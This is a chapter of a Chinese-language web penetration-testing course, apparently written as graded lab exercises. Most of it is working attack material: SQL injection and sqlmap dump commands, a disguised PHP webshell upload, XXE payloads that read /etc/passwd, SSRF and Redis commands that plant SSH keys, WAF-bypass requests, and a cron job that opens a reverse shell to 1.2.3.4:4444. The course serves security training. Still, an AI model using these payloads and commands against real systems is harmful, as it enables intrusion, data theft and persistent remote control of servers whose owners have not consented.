6.1 課程講解與實戰考核
6.1.1 SQL注入篇考核
考核目標:通過手動注入與工具結合,獲取目標數據庫敏感信息。
題目示例:
-
目標URL:
http://vuln-site.com/product?id=1
-
要求:
-
判斷注入類型(聯合查詢/報錯注入/布爾盲注)。
-
獲取數據庫名稱、表名及用戶密碼字段。
-
使用Sqlmap自動化驗證結果。
解題思路:
- 探測注入點:
http://vuln-site.com/product?id=1' AND 1=1-- // 正常響應 http://vuln-site.com/product?id=1' AND 1=2-- // 異常響應
- 聯合查詢注入:
' ORDER BY 3-- // 確定字段數為3 ' UNION SELECT 1,2,database()--
- Sqlmap自動化:
sqlmap -u "http://vuln-site.com/product?id=1" --risk=3 --level=5 --dump
6.1.2 文件上傳繞過考核
考核目標:繞過黑名單校驗上傳Webshell。
題目場景:
-
網站僅允許上傳
.jpg
文件,且檢測文件頭與Content-Type。 -
目標:上傳PHP Webshell并觸發執行。
繞過步驟:
-
文件頭偽造:在Webshell開頭添加
GIF89a
。 -
雙擴展名繞過:命名文件為
shell.jpg.php
。 -
Burp修改Content-Type:
POST /upload.php HTTP/1.1 Content-Type: multipart/form-data Content-Disposition: form-data; name="file"; filename="shell.jpg" Content-Type: image/jpeg <?php system($_GET['cmd']); ?>
6.1.3 XXE與SSRF實戰考核
考核目標:利用XXE讀取服務器文件,并通過SSRF攻擊內網服務。
題目環境:
-
目標接口:XML數據解析端點(
/api/parse
)。 -
內網存在未授權Redis服務(
192.168.1.100:6379
)。
解題步驟:
- XXE讀取/etc/passwd:
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <data>&xxe;</data>
- SSRF探測內網Redis:
<!DOCTYPE test [<!ENTITY ssrf SYSTEM "http://192.168.1.100:6379">]>
- Redis未授權寫SSH密鑰:
redis-cli -h 192.168.1.100 flushall echo -e "\n\nssh-rsa AAAAB3NzaC... user@kali" | redis-cli -h 192.168.1.100 -x set payload redis-cli -h 192.168.1.100 config set dir /root/.ssh redis-cli -h 192.168.1.100 config set dbfilename "authorized_keys" redis-cli -h 192.168.1.100 save
6.2 擴展知識與高階技巧
6.2.1 常見WAF繞過技巧
- 分塊傳輸編碼:
POST /login.php HTTP/1.1 Transfer-Encoding: chunked 7\r\n user=ad\r\n 6\r\n min&pass=1\r\n 0\r\n
- 注釋符混淆:
' UN/**/ION SEL/**/ECT 1,2,3--
6.2.2 未授權漏洞實戰(Redis)
攻擊鏈:
-
發現Redis未授權訪問:
nmap -p 6379 192.168.1.0/24
。 -
寫入定時任務反彈Shell:
redis-cli -h 192.168.1.100 config set dir /var/spool/cron config set dbfilename root set payload "* * * * * bash -i >& /dev/tcp/1.2.3.4/4444 0>&1" save
6.3 考核評分標準
-
基礎分(60%):完成漏洞利用的核心步驟(如注入成功、文件上傳、權限獲取)。
-
進階分(30%):繞過防御機制(如WAF、加密參數)。
-
創新分(10%):提出新穎攻擊鏈或自動化腳本(如結合多個漏洞橫向移動)。
模擬考核環境搭建指南
- Docker快速部署漏洞靶場:
docker run -d -p 80:80 vulnerables/web-dvwa
-
Kali工具集成:預裝Sqlmap、Burp Suite、CobaltStrike。
-
日志監控:使用ELK堆棧記錄攻擊行為,用于事后復盤。
下期預告
終章:綜合實戰演練——從信息收集到內網滲透,還原真實紅隊攻擊全流程!